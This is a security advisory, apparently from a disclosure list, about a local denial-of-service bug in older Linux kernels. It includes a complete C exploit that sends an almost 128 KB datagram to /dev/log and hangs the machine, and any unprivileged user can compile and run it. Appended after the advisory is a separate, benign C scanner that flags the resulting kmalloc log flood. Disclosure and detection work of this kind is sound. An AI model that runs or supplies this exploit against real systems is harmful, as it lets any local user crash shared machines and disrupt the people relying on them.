Local Denial of Service attack against Linux (/dev/log & socket)
--------------------------------------------------------------------------------
SUMMARY
A new locally exploitable DoS attack has been discovered against Linux.
This DoS does not require any special privileges, and will hang the latest
Linux kernels.
DETAILS
Vulnerable systems:
Linux 2.2.12
Linux 2.2.14
Linux 2.3.99-pre2
The following exploit code will hang any Linux machine on various Pentium
platforms. Note that this does not require any special privileges, and any
user can compile and run it.
The send system call immediately puts the kernel in a loop spewing
"kmalloc: Size (131076) too large" forever (or until you hit the reset
button).
Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter, despite the documentation to the
contrary.
Exploit:
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;
    int i;

    /* Fill the buffer with printable characters and terminate it. */
    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' '+(i%95);
    buf[i] = '\0';

    /* Address of the syslog UNIX domain socket. */
    SyslogAddr.sa_family = AF_UNIX;
    strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );

    /* One datagram of almost 128 KB sent to /dev/log. */
    LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
    sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
    return 0;
}
----
Confusing, huh? The newer kernels are precisely the ones that have the bug ;)
-------
AFLHI 058009990407128029/089802---(102598//991024)
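
Added example (not part of the original advisory or post): a small C scanner for captured console or kernel log text that flags the repeated "kmalloc: Size (...) too large" message described in the advisory. The function names, the threshold of 3 and the sample log lines are constructed assumptions.

```c
/* Added example, not from the advisory: names, threshold, sample are constructed. */
#include <stdio.h>
#include <string.h>

#define FLOOD_THRESHOLD 3 /* assumed: repeats of one size that indicate a loop */

/* Return 1 and store the size if the line carries the kernel message. */
static int parse_kmalloc_line(const char *line, unsigned long *size)
{
    int end = 0; /* set by %n only when the whole pattern matched */
    const char *p = strstr(line, "kmalloc: Size (");
    return p && sscanf(p, "kmalloc: Size (%lu) too large%n", size, &end) == 1 && end > 0;
}

/* Longest run of consecutive matching lines reporting the same size. */
static int longest_kmalloc_run(const char *log, unsigned long *size_out)
{
    char line[256];
    unsigned long size = 0, prev = 0;
    int run = 0, best = 0;
    *size_out = 0;
    while (*log) {
        size_t n = strcspn(log, "\n");
        size_t c = n < sizeof line - 1 ? n : sizeof line - 1; /* truncate long lines */
        memcpy(line, log, c);
        line[c] = '\0';
        log += n + (log[n] == '\n');
        if (!parse_kmalloc_line(line, &size)) { run = 0; continue; }
        run = (run > 0 && size == prev) ? run + 1 : 1;
        prev = size;
        if (run > best) { best = run; *size_out = size; }
    }
    return best;
}

static const char SAMPLE_LOG[] = /* constructed sample, not real output */
    "host kernel: eth0: link up\n"
    "host kernel: kmalloc: Size (131076) too large\n"
    "host kernel: kmalloc: Size (131076) too large\n"
    "host kernel: kmalloc: Size (131076) too large\n"
    "host kernel: kmalloc: Size (abc) too large\n";

int main(void)
{
    unsigned long size;
    int run = longest_kmalloc_run(SAMPLE_LOG, &size);
    printf("run=%d size=%lu flood=%d\n", run, size, run >= FLOOD_THRESHOLD);
    return 0;
}
```

Because the advisory describes the machine as hung until reset, the input is assumed to come from a capture made outside the affected host, such as a serial console log.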